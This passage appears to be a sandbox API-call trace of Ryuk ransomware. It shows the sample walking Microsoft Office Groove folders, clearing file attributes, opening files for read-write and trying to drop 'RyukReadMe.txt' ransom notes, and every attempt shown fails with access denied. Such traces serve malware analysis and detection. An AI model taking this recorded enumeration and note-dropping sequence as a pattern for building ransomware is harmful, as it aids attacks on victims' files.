dwFileAttributes=0x80) returned 0 [0137.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ERROR.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\error.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.057] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.057] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.057] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.057] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO", dwFileAttributes=0x80) returned 0 [0137.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.058] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.058] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.058] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.058] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.058] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.JS", dwFileAttributes=0x80) returned 0 [0137.058] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FORM.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\form.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.058] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.058] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.058] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.058] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBlankPage.html", dwFileAttributes=0x80) returned 0 [0137.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.059] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.059] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.059] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 0 [0137.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsbrowserupgrade.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.061] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.061] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.061] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.061] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.061] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsColorChart.html", dwFileAttributes=0x80) returned 0 [0137.061] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formscolorchart.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.062] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.062] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.062] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.062] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.062] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 0 [0137.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsformtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.062] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.062] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.062] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.062] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePage.html", dwFileAttributes=0x80) returned 0 [0137.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.063] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.063] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.063] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.063] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.063] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageScript.js", dwFileAttributes=0x80) returned 0 [0137.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepagescript.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.063] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.063] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.064] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.064] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageStyle.css", dwFileAttributes=0x80) returned 0 [0137.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepagestyle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.064] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.064] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.064] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.064] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.064] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 0 [0137.064] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsimagetemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.065] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.065] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.065] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.065] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 0 [0137.065] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsmacrotemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.065] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.065] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.065] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.065] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.067] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.067] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.067] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.067] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 0 [0137.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.068] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.068] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.068] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.068] SetLastError (dwErrCode=0x0) [0137.068] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.068] GetLastError () returned 0x5 [0137.068] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.068] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.068] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2d60 [0137.070] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.070] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.070] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Adobe.css", dwFileAttributes=0x80) returned 0 [0137.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\adobe.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.071] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.071] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.071] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.071] SetLastError (dwErrCode=0x0) [0137.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.071] GetLastError () returned 0x5 [0137.071] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.071] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.071] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.072] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.072] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.072] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.072] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.073] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.073] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.073] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.073] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.074] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.074] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.074] SetLastError (dwErrCode=0x0) [0137.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.074] GetLastError () returned 0x5 [0137.074] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.074] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.074] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.074] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana.css", dwFileAttributes=0x80) returned 0 [0137.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\americana.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.074] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.074] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.074] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.074] SetLastError (dwErrCode=0x0) [0137.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.075] GetLastError () returned 0x5 [0137.075] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.075] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.075] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.075] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.075] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.075] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0137.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.075] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.075] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.075] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.076] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.076] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.077] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.077] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.077] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.077] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.077] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.077] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.077] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.077] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.078] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.078] CloseHandle (hObject=0xffffffffffffffff) returned 0 